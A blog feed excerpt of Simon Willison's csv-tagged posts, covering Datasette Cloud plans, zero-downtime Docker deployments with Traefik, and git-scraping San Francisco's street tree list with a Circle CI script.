&lt;p&gt;Aside from playing with GitHub Actions and Cloud Run, my focus over the past week has been working on Datasette Cloud. Datasette Cloud is the current name I'm using for my hosted &lt;a href="https://datasette.readthedocs.io/"&gt;Datasette&lt;/a&gt; product - the idea being that I'll find it &lt;em&gt;a lot&lt;/em&gt; easier to get &lt;a href="https://simonwillison.net/2019/Sep/10/jsk-fellowship/"&gt;feedback on Datasette from journalists&lt;/a&gt; if they can use it without having to install anything!&lt;/p&gt;

&lt;p&gt;My MVP for Datasette Cloud is that I can use it to instantly provision a new, private Datasette instance for a journalist (or team of journalists) that they can then sign into, start playing with and start uploading their data to (initially as CSV files).&lt;/p&gt;

&lt;p&gt;I have to solve quite a few problems to get there:&lt;/p&gt;

&lt;ul&gt;&lt;li&gt;Secure, isolated instances of Datasette. A team or user should only be able to see their own files. I plan to solve this using Docker containers that are mounted such that they can only see their own dedicated volumes.&lt;/li&gt;&lt;li&gt;The ability to provision new instances as easily as possible - and give each one its own HTTPS subdomain.&lt;/li&gt;&lt;li&gt;Authentication: users need to be able to register and sign in to accounts. I could use &lt;a href="https://github.com/simonw/datasette-auth-github"&gt;datasette-auth-github&lt;/a&gt; for this but I'd like to be able to support regular email/password accounts too.&lt;/li&gt;&lt;li&gt;Users need to be able to upload CSV files and have them converted into a SQLite database compatible with Datasette.&lt;/li&gt;&lt;/ul&gt;

&lt;h3&gt;Zero downtime deployments&lt;/h3&gt;

&lt;p&gt;I have a stretch goal which I'm taking pretty seriously: I want to have a mechanism in place for zero-downtime deployments of new versions of the software.&lt;/p&gt;

&lt;p&gt;Arguable this is an unneccessary complication for an MVP. I may not fully implement it, but I do want to at least know that the path I've taken is compatible with zero downtime deployments.&lt;/p&gt;

&lt;p&gt;Why do zero downtime deployments matter so much to me? Because they are desirable for rapid iteration, and crucial for setting up continuious deployment. Even a couple of seconds of downtime during a deployment leaves a psychological desire not to deploy too often. I've seen the productivity boost that deploying fearlessly multiple times a day brings, and I want it.&lt;/p&gt;

&lt;p&gt;So I've been doing a bunch of research into zero downtime deployment options (thanks to some &lt;a href="https://twitter.com/simonw/status/1217599189921628160"&gt;great help on Twitter&lt;/a&gt;) and I think I have something that's going to work for me.&lt;/p&gt;

&lt;p&gt;The first ingredient is &lt;a href="https://docs.traefik.io/"&gt;Traefik&lt;/a&gt; - a new-to-me edge router (similar to nginx) which has a delightful focus on runtime configuration based on automatic discovery.&lt;/p&gt;

&lt;p&gt;It works with a bunch of different technology stacks, but I'm going to be using it with regular Docker. Traefik watches for new Docker containers, reads their labels and uses that to reroute traffic to them.&lt;/p&gt;

&lt;p&gt;So I can launch a new Docker container, apply the Docker label &lt;code&gt;"traefik.frontend.rule": "Host:subdomain.mydomain.com"&lt;/code&gt; and Traefik will start proxying traffic to that subdomain directly to that container.&lt;/p&gt;

&lt;p&gt;Traefik also has extremely robust built-in support for Lets Encrypt to issue certificates. I managed to &lt;a href="https://docs.traefik.io/https/acme/#wildcard-domains"&gt;issue a wildcard TLS certificate&lt;/a&gt; for my entire domain, so new subdomains are encrypted straight away. This did require me to give Traefik API access to modify DNS entries - I'm running DNS for this project on Digital Ocean and thankfully Traefik knows how to do this by talking to their API.&lt;/p&gt;

&lt;p&gt;That solves provisioning: when I create a new account I can call the Docker API (from Python) to start up a new, labelled container on a subdomain protected by a TLS certificate.&lt;/p&gt;

&lt;p&gt;I still needed a way to run a zero-downtime deployment of a new container (for example when I release a new version of Datasette and want to upgrade everyone). After quite a bit of research (during which I discovered you can't modify the labels on a Docker container without restarting it) I settled on the approach described in &lt;a href="https://coderbook.com/@marcus/how-to-do-zero-downtime-deployments-of-docker-containers/"&gt;this article&lt;/a&gt;.&lt;/p&gt;

&lt;p&gt;Essentially you configure Traefik to retry failed requests, start a new, updated container with the same routing information as the existing one (causing Traefik to load balance HTTP requests across both), then shut down the old container and trust Traefik to retry in-flight requests against the one that's still running.&lt;/p&gt;

&lt;p&gt;Rudimentary testing with &lt;code&gt;ab&lt;/code&gt; suggested that this is working as desired.&lt;/p&gt;

&lt;p&gt;One remaining problem: if Traefik is running in a Docker container and proxying all of my traffic, how can I upgrade Traefik itself without any downtime?&lt;/p&gt;

&lt;p&gt;&lt;a href="https://twitter.com/simonw/status/1218604019033100288"&gt;Consensus on Twitter&lt;/a&gt; seems to be that Docker on its own doesn't have a great mechanism for this (I was hoping I could re-route port 80 traffic to the host to a different container in an atomic way). But... &lt;code&gt;iptables&lt;/code&gt; has mechanisms that can re-route traffic from one port to another - so I should be able to run a new Traefik container on a different port and re-route to it at the operating system level.&lt;/p&gt;

&lt;p&gt;That's quite enough yak shaving around zero time deployments for now!&lt;/p&gt;

&lt;h3 id="datasette-upload-csvs"&gt;datasette-upload-csvs&lt;/h3&gt;

&lt;p&gt;A big problem I'm seeing with the current Datasette ecosystem is that while Datasette offers a web-based user interface for querying and accessing data, the &lt;a href="https://datasette.readthedocs.io/en/0.33/ecosystem.html#tools-for-creating-sqlite-databases"&gt;tools I've written for actually creating those databases&lt;/a&gt; are decidedly command-line only.&lt;/p&gt;

&lt;p&gt;Telling journalists they have to learn to install and run software on the command-line is way too high a barrier to entry.&lt;/p&gt;

&lt;p&gt;I've always intended to have Datasette plugins that can handle uploading and converting data. It's time to actually build one!&lt;/p&gt;

&lt;p&gt;&lt;a href="https://github.com/simonw/datasette-upload-csvs"&gt;datasette-upload-csvs&lt;/a&gt; is what I've got so far. It has a big warning not to use it in the README - it's &lt;em&gt;very&lt;/em&gt; alpha sofware at the moment - but it does prove that the concept can work.&lt;/p&gt;

&lt;p&gt;It uses the &lt;a href="https://datasette.readthedocs.io/en/stable/plugins.html#asgi-wrapper-datasette"&gt;asgi_wrapper&lt;/a&gt; plugin hook to intercept requests to the path &lt;code&gt;/-/upload-csv&lt;/code&gt; and forward them on to another ASGI app, written using Starlette, which provides a basic upload form and then handles the upload.&lt;/p&gt;

&lt;p&gt;Uploaded CSVs are converted to SQLite using &lt;a href="https://sqlite-utils.readthedocs.io/"&gt;sqlite-utils&lt;/a&gt; and written to the first mutable database attached to Datasette.&lt;/p&gt;

&lt;p&gt;It needs a bunch more work (and tests) before I'm comfortable telling people to use it, but it does at least exist as a proof of concept for me to iterate on.&lt;/p&gt;

&lt;h3&gt;datasette-auth-django-cookies&lt;/h3&gt;

&lt;p&gt;No code for this yet, but I'm beginning to flesh it out as a concept.&lt;/p&gt;

&lt;p&gt;I don't particularly want to implement user registration and authentication and cookies and password hashing. I know how to do it, which means I know it's not something you shuld re-roll for every project.&lt;/p&gt;

&lt;p&gt;Django has a really well designed, robust authentication system. Can't I just use that?&lt;/p&gt;

&lt;p&gt;Since all of my applications will be running on subdomains of a single domain, my current plan is to have a regular Django application which handles registration and logins. Each subdomain will then run a custom piece of Datasette ASGI middleware which knows how to read and validate the Django authentication cookie.&lt;/p&gt;

&lt;p&gt;This should give me single sign-on with a single, audited codebase for registration and login with (hopefully) the least amount of work needed to integrate it with Datasette.&lt;/p&gt;

&lt;p&gt;Code for this will hopefully follow over the next week.&lt;/p&gt;

&lt;h3&gt;Niche Museums - now publishing weekly&lt;/h3&gt;

&lt;p&gt;I hit a milestone with my &lt;a href="https://www.niche-museums.com/"&gt;Niche Museums&lt;/a&gt; project: the site now lists details of 100 museums!&lt;/p&gt;

&lt;p&gt;For the 100th entry I decided to celebrate with by far the most rewarding (and exclusive) niche museum experience I've ever had: &lt;a href="https://www.niche-museums.com/browse/museums/100"&gt;Ray Bandar's Bone Palace&lt;/a&gt;.&lt;/p&gt;

&lt;p&gt;You should read the entry. The short version is that Ray Bandar collected 7,000 animals skulls over a sixty year period, and Natalie managed to score us a tour of his incredible basement mere weeks before the collection was donated to the California Academy of Sciences.&lt;/p&gt;

&lt;img src="https://niche-museums.imgix.net/ray-bandar.jpeg?w=1600&amp;amp;h=800&amp;amp;fit=crop&amp;amp;auto=compress" alt="The basement full of skulls" style="max-width: 100%" /&gt;

&lt;p&gt;Posting one museum a day was taking increasingly more of my time, as I had to delve into the depths of my museums-I-have-visited backlog and do increasing amounts of research. Now that I've hit 100 I'm going to switch to publishing one a week, which should also help me visit new ones quickly enough to keep the backlog full!&lt;/p&gt;

&lt;p&gt;So I only posted four this week:&lt;/p&gt;

&lt;ul&gt;&lt;li&gt;&lt;a href="https://www.niche-museums.com/browse/museums/97"&gt;The ruins of Llano del Rio&lt;/a&gt; in Los Angeles County&lt;/li&gt;&lt;li&gt;&lt;a href="https://www.niche-museums.com/browse/museums/98"&gt;Cleveland Hungarian Museum&lt;/a&gt; in Cleveland&lt;/li&gt;&lt;li&gt;&lt;a href="https://www.niche-museums.com/browse/museums/99"&gt;New Orleans Historic Voodoo Museum&lt;/a&gt; in New Orleans&lt;/li&gt;&lt;li&gt;&lt;a href="https://www.niche-museums.com/browse/museums/100"&gt;Ray Bandar's Bone Palace&lt;/a&gt; in San Francisco&lt;/li&gt;&lt;/ul&gt;

&lt;p&gt;I also &lt;a href="https://github.com/simonw/museums/commits/842dfb96"&gt;built a simple JavaScript image gallery&lt;/a&gt; to better display the 54 photos I published from our trip to Ray Bandar's basement.&lt;/p&gt;
    
        &lt;p&gt;Tags: &lt;a href="https://simonwillison.net/tags/csv"&gt;csv&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/deployment"&gt;deployment&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/museums"&gt;museums&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/projects"&gt;projects&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/zero-downtime"&gt;zero-downtime&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/docker"&gt;docker&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/datasette"&gt;datasette&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/weeknotes"&gt;weeknotes&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/traefik"&gt;traefik&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/datasette-cloud"&gt;datasette-cloud&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/digitalocean"&gt;digitalocean&lt;/a&gt;&lt;/p&gt;
    

</summary><category term="csv"/><category term="deployment"/><category term="museums"/><category term="projects"/><category term="zero-downtime"/><category term="docker"/><category term="datasette"/><category term="weeknotes"/><category term="traefik"/><category term="datasette-cloud"/><category term="digitalocean"/></entry><entry><title>Dockerfile for creating a Datasette of NHS dentist information</title><link href="https://simonwillison.net/2019/Apr/26/dockerfile-datasette-dentists/#atom-tag" rel="alternate"/><published>2019-04-26T14:09:34+00:00</published><updated>2019-04-26T14:09:34+00:00</updated><id>https://simonwillison.net/2019/Apr/26/dockerfile-datasette-dentists/#atom-tag</id><summary type="html">
    
&lt;p&gt;&lt;strong&gt;&lt;a href="https://github.com/hubgit/datasette-dentists/blob/master/Dockerfile"&gt;Dockerfile for creating a Datasette of NHS dentist information&lt;/a&gt;&lt;/strong&gt;&lt;/p&gt;
Really neat Dockerfile example by Alf Eaton that uses multi-stage builds to pull dentist information from the NHS, compile to SQLite using csvs-to-sqlite and serve the results with Datasette. TIL the NHS like to use ¬ as their CSV separator!

    &lt;p&gt;&lt;small&gt;&lt;/small&gt;Via &lt;a href="https://twitter.com/invisiblecomma/status/1121768361648635904"&gt;@invisiblecomma&lt;/a&gt;&lt;/small&gt;&lt;/p&gt;


    &lt;p&gt;Tags: &lt;a href="https://simonwillison.net/tags/alf-eaton"&gt;alf-eaton&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/csv"&gt;csv&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/docker"&gt;docker&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/datasette"&gt;datasette&lt;/a&gt;&lt;/p&gt;



</summary><category term="alf-eaton"/><category term="csv"/><category term="docker"/><category term="datasette"/></entry><entry><title>tsv-utils</title><link href="https://simonwillison.net/2019/Apr/7/tsv-utils/#atom-tag" rel="alternate"/><published>2019-04-07T20:29:38+00:00</published><updated>2019-04-07T20:29:38+00:00</updated><id>https://simonwillison.net/2019/Apr/7/tsv-utils/#atom-tag</id><summary type="html">
    
&lt;p&gt;&lt;strong&gt;&lt;a href="https://github.com/eBay/tsv-utils"&gt;tsv-utils&lt;/a&gt;&lt;/strong&gt;&lt;/p&gt;
Powerful collection of CLI tools for processing TSV files, written in D for performance and released by eBay. Includes a csv2tsv conversion tool. You can download an archive of pre-built binaries for Linux and OS X from their releases page: worked fine on my Mac.

    &lt;p&gt;&lt;small&gt;&lt;/small&gt;Via &lt;a href="https://twitter.com/jeffsonstein/status/1114985044144271360"&gt;@jeffsonstein&lt;/a&gt;&lt;/small&gt;&lt;/p&gt;


    &lt;p&gt;Tags: &lt;a href="https://simonwillison.net/tags/cli"&gt;cli&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/csv"&gt;csv&lt;/a&gt;&lt;/p&gt;



</summary><category term="cli"/><category term="csv"/></entry><entry><title>csv-diff 0.3.1</title><link href="https://simonwillison.net/2019/Apr/7/csv-diff/#atom-tag" rel="alternate"/><published>2019-04-07T20:03:20+00:00</published><updated>2019-04-07T20:03:20+00:00</updated><id>https://simonwillison.net/2019/Apr/7/csv-diff/#atom-tag</id><summary type="html">
    
&lt;p&gt;&lt;strong&gt;&lt;a href="https://github.com/simonw/csv-diff/releases/tag/0.3.1"&gt;csv-diff 0.3.1&lt;/a&gt;&lt;/strong&gt;&lt;/p&gt;
I released a minor update to my csv-diff CLI tool today which does a better job of displaying a human-readable representation of rows that have been added or removed from a file—previously they were represented as an ugly JSON dump. My script monitoring changes to the official list of trees in San Francisco has been running for a month now and has captured 23 commits!

    &lt;p&gt;&lt;small&gt;&lt;/small&gt;Via &lt;a href="https://twitter.com/simonw/status/1114979445343842304"&gt;@simonw&lt;/a&gt;&lt;/small&gt;&lt;/p&gt;


    &lt;p&gt;Tags: &lt;a href="https://simonwillison.net/tags/cli"&gt;cli&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/csv"&gt;csv&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/diff"&gt;diff&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/projects"&gt;projects&lt;/a&gt;&lt;/p&gt;



</summary><category term="cli"/><category term="csv"/><category term="diff"/><category term="projects"/></entry><entry><title>VisiData</title><link href="https://simonwillison.net/2019/Mar/18/visidata/#atom-tag" rel="alternate"/><published>2019-03-18T03:45:16+00:00</published><updated>2019-03-18T03:45:16+00:00</updated><id>https://simonwillison.net/2019/Mar/18/visidata/#atom-tag</id><summary type="html">
    
&lt;p&gt;&lt;strong&gt;&lt;a href="http://visidata.org/"&gt;VisiData&lt;/a&gt;&lt;/strong&gt;&lt;/p&gt;
Intriguing tool by Saul Pwanson: VisiData is a command-line "textpunk utility" for browsing and manipulating tabular data. &lt;code&gt;pip3 install visidata&lt;/code&gt; and then &lt;code&gt;vd myfile.csv&lt;/code&gt; (or &lt;code&gt;.json&lt;/code&gt; or &lt;code&gt;.xls&lt;/code&gt; or SQLite or others) and get an interactive terminal UI for quickly searching through the data, conducting frequency analysis of columns, manipulating it and much more besides. Two tips for if you start playing with it: hit &lt;code&gt;gq&lt;/code&gt; to exit, and hit &lt;code&gt;Ctrl+H&lt;/code&gt; to view the help screen.

    &lt;p&gt;&lt;small&gt;&lt;/small&gt;Via &lt;a href="https://twitter.com/saulfp/status/1107484382313340929"&gt;@saulfp&lt;/a&gt;&lt;/small&gt;&lt;/p&gt;


    &lt;p&gt;Tags: &lt;a href="https://simonwillison.net/tags/csv"&gt;csv&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/data-journalism"&gt;data-journalism&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/python"&gt;python&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/sqlite"&gt;sqlite&lt;/a&gt;&lt;/p&gt;



</summary><category term="csv"/><category term="data-journalism"/><category term="python"/><category term="sqlite"/></entry><entry><title>Generating a commit log for San Francisco's official list of trees</title><link href="https://simonwillison.net/2019/Mar/13/tree-history/#atom-tag" rel="alternate"/><published>2019-03-13T14:49:48+00:00</published><updated>2019-03-13T14:49:48+00:00</updated><id>https://simonwillison.net/2019/Mar/13/tree-history/#atom-tag</id><summary type="html">
    &lt;p&gt;San Francisco has a &lt;a href="https://datasf.org/"&gt;neat open data portal&lt;/a&gt; (as do an &lt;a href="https://opendatainception.io/"&gt;increasingly large number&lt;/a&gt; of cities these days). For a few years my favourite file on there has been &lt;a href="https://data.sfgov.org/City-Infrastructure/Street-Tree-List/tkzw-k3nq"&gt;Street Tree List&lt;/a&gt;, a list of all 190,000 trees in the city maintained by the Department of Public Works.&lt;/p&gt;
&lt;p&gt;I’ve been using that file for Datasette demos &lt;a href="https://simonwillison.net/2017/Nov/25/new-in-datasette/"&gt;for a while now&lt;/a&gt;, but last week I noticed something intriguing: the file had been recently updated. On closer inspection it turns out it’s updated on a regular basis! I had assumed it was a static snapshot of trees at a certain point in time, but I was wrong: &lt;code&gt;Street_Tree_List.csv&lt;/code&gt; is a living document.&lt;/p&gt;
&lt;p&gt;Back in September 2017 I built a &lt;a href="https://simonwillison.net/2017/Sep/10/scraping-irma/"&gt;scraping project relating to hurricane Irma&lt;/a&gt;. The idea was to take data sources like FEMA’s list of open shelters and track them over time, by scraping them into a git repository and committing after every fetch.&lt;/p&gt;
&lt;p&gt;I’ve been meaning to spend more time with this idea, and building a commit log for San Francisco’s trees looked like an ideal opportunity to do so.&lt;/p&gt;
&lt;h3&gt;&lt;a id="sftreehistory_8"&gt;&lt;/a&gt;sf-tree-history&lt;/h3&gt;
&lt;p&gt;Here’s the result: &lt;a href="https://github.com/simonw/sf-tree-history"&gt;sf-tree-history&lt;/a&gt;, a git repository dedicated to recording the history of changes made to the official list of San Francisco’s trees. The repo contains three things: the latest copy of &lt;code&gt;Street_Tree_List.csv&lt;/code&gt;, a &lt;code&gt;README&lt;/code&gt;, and a &lt;a href="https://github.com/simonw/sf-tree-history/blob/master/.circleci/config.yml"&gt;Circle CI configuration&lt;/a&gt; that grabs a new copy of the file every night and, if it has changed, commits it to git and pushes the result to GitHub.&lt;/p&gt;
&lt;p&gt;The most interesting part of the repo is the &lt;a href="https://github.com/simonw/sf-tree-history/commits/master"&gt;commit history&lt;/a&gt; itself. I’ve only been running the script for just over a week, but I already have some useful illustrative commits:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;a href="https://github.com/simonw/sf-tree-history/commit/7ab432cdcb8d7914cfea4a5b59803f38cade532b"&gt;7ab432cdcb8d7914cfea4a5b59803f38cade532b&lt;/a&gt; from March 6th records three new trees added to the file: two Monterey Pines and a Blackwood Acacia.&lt;/li&gt;
&lt;li&gt;&lt;a href="https://github.com/simonw/sf-tree-history/commit/d6b258959af9546909b2eee836f0156ed88cd45d"&gt;d6b258959af9546909b2eee836f0156ed88cd45d&lt;/a&gt; from March 12th shows four changes made to existing records. Of particular interest: TreeID 235981 (a Cherry Plum) had its address updated from 412 Webster St to 410 Webster St and its latitude and longitude tweaked a little bit as well.&lt;/li&gt;
&lt;li&gt;&lt;a href="https://github.com/simonw/sf-tree-history/commit/ca66d9a5fdd632549301d249c487004a5b68abf2"&gt;ca66d9a5fdd632549301d249c487004a5b68abf2&lt;/a&gt; lists 2151 rows changed, 1280 rows added! I found an old copy of &lt;code&gt;Street_Tree_List.csv&lt;/code&gt; on my laptop from April 2018, so for fun I loaded it into the repository and used &lt;code&gt;git commit amend&lt;/code&gt; to back-date the commit to almost a year ago. I generated a commit message between that file and the version from 9 days ago which came in at around 10,000 lines of text. Git handled that just fine, but GitHub’s web view &lt;a href="https://github.com/simonw/sf-tree-history/commit/ca66d9a5fdd632549301d249c487004a5b68abf2"&gt;sadly truncates it&lt;/a&gt;.&lt;/li&gt;
&lt;/ul&gt;
&lt;h3&gt;&lt;a id="csvdiff_18"&gt;&lt;/a&gt;csv-diff&lt;/h3&gt;
&lt;p&gt;One of the things I learned from my hurricane Irma project was the importance of human-readable commit messages that summarize the detected changes. I initially wrote some code to generate those by hand, but then realized that this could be extracted into a reusable tool.&lt;/p&gt;
&lt;p&gt;The result is &lt;a href="https://github.com/simonw/csv-diff"&gt;csv-diff&lt;/a&gt;, a tiny Python CLI tool which can generate a human (or machine) readable version of the differences between two CSV files.&lt;/p&gt;
&lt;p&gt;Using it looks like this:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;$ csv-diff one.csv two.csv --key=id
1 row added, 1 row removed, 1 row changed

1 row added

  {&amp;quot;id&amp;quot;: &amp;quot;3&amp;quot;, &amp;quot;name&amp;quot;: &amp;quot;Bailey&amp;quot;, &amp;quot;age&amp;quot;: &amp;quot;1&amp;quot;}

1 row removed

  {&amp;quot;id&amp;quot;: &amp;quot;2&amp;quot;, &amp;quot;name&amp;quot;: &amp;quot;Pancakes&amp;quot;, &amp;quot;age&amp;quot;: &amp;quot;2&amp;quot;}

1 row changed

  Row 1
    age: &amp;quot;4&amp;quot; =&amp;gt; &amp;quot;5&amp;quot;
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;The &lt;a href="https://github.com/simonw/csv-diff/blob/master/README.md"&gt;csv-diff README&lt;/a&gt; has further details on the tool.&lt;/p&gt;
&lt;h3&gt;&lt;a id="Circle_CI_44"&gt;&lt;/a&gt;Circle CI&lt;/h3&gt;
&lt;p&gt;My favourite thing about the &lt;code&gt;sf-tree-history&lt;/code&gt; project is that it costs me nothing to run - either in hosting costs or (hopefully) in terms of ongoing maintenance.&lt;/p&gt;
&lt;p&gt;The git repository is hosted for free on GitHub. Because it’s a public project, &lt;a href="https://circleci.com/"&gt;Circle CI&lt;/a&gt; will run tasks against it for free.&lt;/p&gt;
&lt;p&gt;My &lt;a href="https://github.com/simonw/sf-tree-history/blob/master/.circleci/config.yml"&gt;.circleci/config.yml&lt;/a&gt; does the rest. It uses Circle’s &lt;a href="https://circleci.com/docs/2.0/workflows/#scheduling-a-workflow"&gt;cron syntax&lt;/a&gt; to schedule a task that runs every night. The task then runs this script (embedded in the YAML configuration):&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;cp Street_Tree_List.csv Street_Tree_List-old.csv
curl -o Street_Tree_List.csv &amp;quot;https://data.sfgov.org/api/views/tkzw-k3nq/rows.csv?accessType=DOWNLOAD&amp;quot;
git add Street_Tree_List.csv
git config --global user.email &amp;quot;treebot@example.com&amp;quot;
git config --global user.name &amp;quot;Treebot&amp;quot;
sudo pip install csv-diff
csv-diff Street_Tree_List-old.csv Street_Tree_List.csv --key=TreeID &amp;gt; message.txt
git commit -F message.txt &amp;amp;&amp;amp; \
  git push -q https://${GITHUB_PERSONAL_TOKEN}@github.com/simonw/sf-tree-history.git master \
  || true
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;This script does all of the work.&lt;/p&gt;
&lt;ol&gt;
&lt;li&gt;First it backs up the existing &lt;code&gt;Street_Tree_list.csv&lt;/code&gt; as &lt;code&gt;Street_Tree_List-old.csv&lt;/code&gt;, in order to be able to run a comparison later.&lt;/li&gt;
&lt;li&gt;It downloads the latest copy of &lt;code&gt;Street_Tree_List.csv&lt;/code&gt; from the San Francisco data portal&lt;/li&gt;
&lt;li&gt;It adds the file to the git index and sets itself an identity for use in the commit&lt;/li&gt;
&lt;li&gt;It installs my &lt;code&gt;csv-diff&lt;/code&gt; utility &lt;a href="https://pypi.org/project/csv-diff/"&gt;from PyPI&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;It uses &lt;code&gt;csv-diff&lt;/code&gt; to create a diff of the two files, and writes that diff to a new file called &lt;code&gt;message.txt&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;Finally, it attempts to create a new commit using &lt;code&gt;message.txt&lt;/code&gt; as the commit message, then pushes the result to GitHub&lt;/li&gt;
&lt;/ol&gt;
&lt;p&gt;The last line is the most complex. Circle CI will mark a build as failed if any of the commands in the &lt;code&gt;run&lt;/code&gt; block return a non-0 exit code. &lt;code&gt;git commit&lt;/code&gt; returns a non-0 exit code if you attempt to run it but none of the files have changed.&lt;/p&gt;
&lt;p&gt;&lt;code&gt;git commit ... &amp;amp;&amp;amp; git push ... || true&lt;/code&gt; ensures that if &lt;code&gt;git commit&lt;/code&gt; succeeds the &lt;code&gt;git push&lt;/code&gt; command will be run, BUT if it fails the &lt;code&gt;|| true&lt;/code&gt; will still return a 0 exit code for the overall line - so Circle CI will not mark the build as failed.&lt;/p&gt;
&lt;p&gt;There’s one last trick here: I’m using &lt;code&gt;git push -q https://${GITHUB_PERSONAL_TOKEN}@github.com/simonw/sf-tree-history.git master&lt;/code&gt; to push my changes to GitHub. This takes advantage of Circle CI environment variables, which are &lt;a href="https://circleci.com/docs/2.0/env-vars/"&gt;the recommended way&lt;/a&gt; to configure secrets such that they cannot be viewed by anyone browsing &lt;a href="https://circleci.com/gh/simonw/sf-tree-history"&gt;your Circle CI builds&lt;/a&gt;. I created a &lt;a href="https://help.github.com/en/articles/creating-a-personal-access-token-for-the-command-line"&gt;personal GitHub auth token&lt;/a&gt; for this project, which I’m using to allow Circle CI to push commits to GitHub on my behalf.&lt;/p&gt;
&lt;h3&gt;&lt;a id="Next_steps_78"&gt;&lt;/a&gt;Next steps&lt;/h3&gt;
&lt;p&gt;I’m really excited about this pattern of using GitHub in combination with Circle CI to track changes to any file that is being posted on the internet. I’m opening up the code (and my &lt;a href="https://github.com/simonw/csv-diff"&gt;csv-diff utility&lt;/a&gt;) in the hope that other people will use them to set up their own tracking projects. Who knows, maybe there’s a file out there that’s even more exciting than San Francisco’s official list of trees!&lt;/p&gt;
    
        &lt;p&gt;Tags: &lt;a href="https://simonwillison.net/tags/csv"&gt;csv&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/data-journalism"&gt;data-journalism&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/git"&gt;git&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/projects"&gt;projects&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/san-francisco"&gt;san-francisco&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/git-scraping"&gt;git-scraping&lt;/a&gt;&lt;/p&gt;
    

</summary><category term="csv"/><category term="data-journalism"/><category term="git"/><category term="projects"/><category term="san-francisco"/><category term="git-scraping"/></entry><entry><title>Datasette 0.23: CSV, SpatiaLite and more</title><link href="https://simonwillison.net/2018/Jun/18/datasette-csv-export/#atom-tag" rel="alternate"/><published>2018-06-18T15:34:04+00:00</published><updated>2018-06-18T15:34:04+00:00</updated><id>https://simonwillison.net/2018/Jun/18/datasette-csv-export/#atom-tag</id><summary type="html">
    
&lt;p&gt;&lt;strong&gt;&lt;a href="http://datasette.readthedocs.io/en/latest/changelog.html#v0-23"&gt;Datasette 0.23: CSV, SpatiaLite and more&lt;/a&gt;&lt;/strong&gt;&lt;/p&gt;
The big new feature in 0.23 is CSV export: any Datasette table or query can now be exported as CSV, including the option to get all matching rows in one giant CSV file taking advantage of Python 3 async and Datasette’s efficient keyset pagination. Also in this release: improved support for SpatiaLite and various JSON API improvements including the ability to expand foreign key labels in JSON and CSV responses.

    &lt;p&gt;&lt;small&gt;&lt;/small&gt;Via &lt;a href="https://twitter.com/simonw/status/1008733990172282880"&gt;@simonw&lt;/a&gt;&lt;/small&gt;&lt;/p&gt;


    &lt;p&gt;Tags: &lt;a href="https://simonwillison.net/tags/csv"&gt;csv&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/projects"&gt;projects&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/datasette"&gt;datasette&lt;/a&gt;&lt;/p&gt;



</summary><category term="csv"/><category term="projects"/><category term="datasette"/></entry><entry><title>sqlitebiter</title><link href="https://simonwillison.net/2018/May/17/sqlitebiter/#atom-tag" rel="alternate"/><published>2018-05-17T22:40:28+00:00</published><updated>2018-05-17T22:40:28+00:00</updated><id>https://simonwillison.net/2018/May/17/sqlitebiter/#atom-tag</id><summary type="html">
    
&lt;p&gt;&lt;strong&gt;&lt;a href="https://github.com/thombashi/sqlitebiter"&gt;sqlitebiter&lt;/a&gt;&lt;/strong&gt;&lt;/p&gt;
Similar to my csvs-to-sqlite tool, but sqlitebiter handles “CSV/Excel/HTML/JSON/LTSV/Markdown/SQLite/SSV/TSV/Google-Sheets”. Most interestingly, it works against HTML pages—run “sqlitebiter -v url ’https://en.wikipedia.org/wiki/Comparison_of_firewalls’” and it will scrape that Wikipedia page and create a SQLite table for each of the HTML tables it finds there.


    &lt;p&gt;Tags: &lt;a href="https://simonwillison.net/tags/csv"&gt;csv&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/scraping"&gt;scraping&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/sqlite"&gt;sqlite&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/datasette"&gt;datasette&lt;/a&gt;&lt;/p&gt;



</summary><category term="csv"/><category term="scraping"/><category term="sqlite"/><category term="datasette"/></entry><entry><title>csvs-to-sqlite 0.8</title><link href="https://simonwillison.net/2018/Apr/24/csvs-to-sqlite/#atom-tag" rel="alternate"/><published>2018-04-24T16:11:01+00:00</published><updated>2018-04-24T16:11:01+00:00</updated><id>https://simonwillison.net/2018/Apr/24/csvs-to-sqlite/#atom-tag</id><summary type="html">
    
&lt;p&gt;&lt;strong&gt;&lt;a href="https://github.com/simonw/csvs-to-sqlite/releases/tag/0.8"&gt;csvs-to-sqlite 0.8&lt;/a&gt;&lt;/strong&gt;&lt;/p&gt;
I released a new version of my csvs-to-sqlite tool this morning with a bunch of handy new features. It can now rename columns and define their types, add the CSV filenames as an additional column, add create indexes on columns and parse dates and datetimes into SQLite-friendly ISO formatted values.


